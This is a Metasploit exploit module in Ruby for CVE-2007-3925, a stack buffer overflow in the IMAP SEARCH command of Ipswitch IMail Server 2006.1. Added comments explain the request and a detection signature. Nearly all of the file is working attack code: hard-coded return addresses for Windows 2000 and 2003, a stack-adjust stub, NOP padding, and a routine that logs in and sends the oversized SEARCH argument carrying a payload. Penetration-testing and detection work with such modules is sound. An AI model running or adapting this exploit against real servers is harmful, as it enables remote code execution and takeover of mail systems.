Path: blob/master/modules/exploits/windows/imap/ipswitch_search.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2007-3925: a stack buffer overflow in the IMAP
# SEARCH verb of Ipswitch IMail Server 2006.1 (see 'Description' below).
#
# Defensive reading of this module: the only traffic it emits after an
# authenticated IMAP login is `a001 SELECT INBOX` followed by a single
# `a002 SEARCH BEFORE <...>` command whose argument is several hundred bytes
# long and is not a date.  That oversized, non-date SEARCH argument is the
# observable a server log review or network signature can key on; the
# remediation is the vendor fix for CVE-2007-3925, since the module carries
# hard-coded return addresses for only two Windows builds (see 'Targets').
class MetasploitModule < Msf::Exploit::Remote
  # Metasploit reliability ranking for this module.
  Rank = AverageRanking

  # The IMAP mixin is presumed to supply connect_login, sock and disconnect,
  # which #exploit calls but this file does not define — verify against the
  # framework version in use.
  include Msf::Exploit::Remote::Imap

  # Registers the module metadata (name, references, payload constraints,
  # targets) with the framework via update_info.
  #
  # @param info [Hash] metadata supplied by the framework; merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ipswitch IMail IMAP SEARCH Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH
        verb. By sending an overly long string, an attacker can overwrite the
        buffer and control program execution.
          In order for this module to be successful, the IMAP user must have at least one
        message.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      # Public identifiers for the underlying vulnerability.
      'References'     =>
        [
          [ 'CVE', '2007-3925' ],
          [ 'OSVDB', '36219' ],
          [ 'BID', '24962' ],
        ],
      # Metasploit metadata: a successful session is expected to run with the
      # privileges of the IMail service.
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          # Maximum encoded payload size the overflow leaves room for.
          'Space'    => 400,
          # Bytes the encoder must avoid: NUL, LF, CR, space, VT, TAB, FF —
          # presumably because the IMAP command parser treats them as
          # terminators/delimiters (inferred; not stated in the module).
          'BadChars' => "\x00\x0a\x0d\x20\x0b\x09\x0c",
          # Raw bytes placed ahead of the encoded payload.
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform'       => 'win',
      # Each target carries a fixed return address ('Ret'), so the module is
      # specific to these two OS build/locale combinations.
      'Targets'        =>
        [
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77f81be3 } ],
          [ 'Windows 2003 SP0 English', { 'Ret' => 0x77c5cee8 } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2007-07-18'))
  end

  # Logs in over IMAP, selects INBOX, and sends the oversized SEARCH command.
  #
  # The request is: tag "a002", "SEARCH BEFORE <", 87 random letters, the
  # target's return address packed as a 32-bit little-endian value ('V'),
  # 20 NOP bytes, the encoded payload, and a closing ">".  Nothing is sent
  # unless connect_login returns exactly true; handler and disconnect run in
  # both branches.
  def exploit

    sploit = "a002 SEARCH BEFORE " + "<" + rand_text_english(87)
    sploit << [target.ret].pack('V') + make_nops(20) + payload.encoded + ">"

    # Authenticate with the configured IMAP credentials (provided by the mixin).
    info = connect_login

    # Strict comparison: a nil or false result (login failure) skips the send.
    if (info == true)
      print_status("Trying target #{target.name}...")
      sock.put("a001 SELECT INBOX\r\n")
      # Drain the server's reply before sending the overflow; the second
      # argument is read as a 3-second timeout — confirm against the Rex
      # socket API of the framework in use.
      sock.get_once(-1, 3)
      sock.put(sploit + "\r\n")
    else
      print_status("Not falling through with exploit")
    end

    handler
    disconnect

  end
end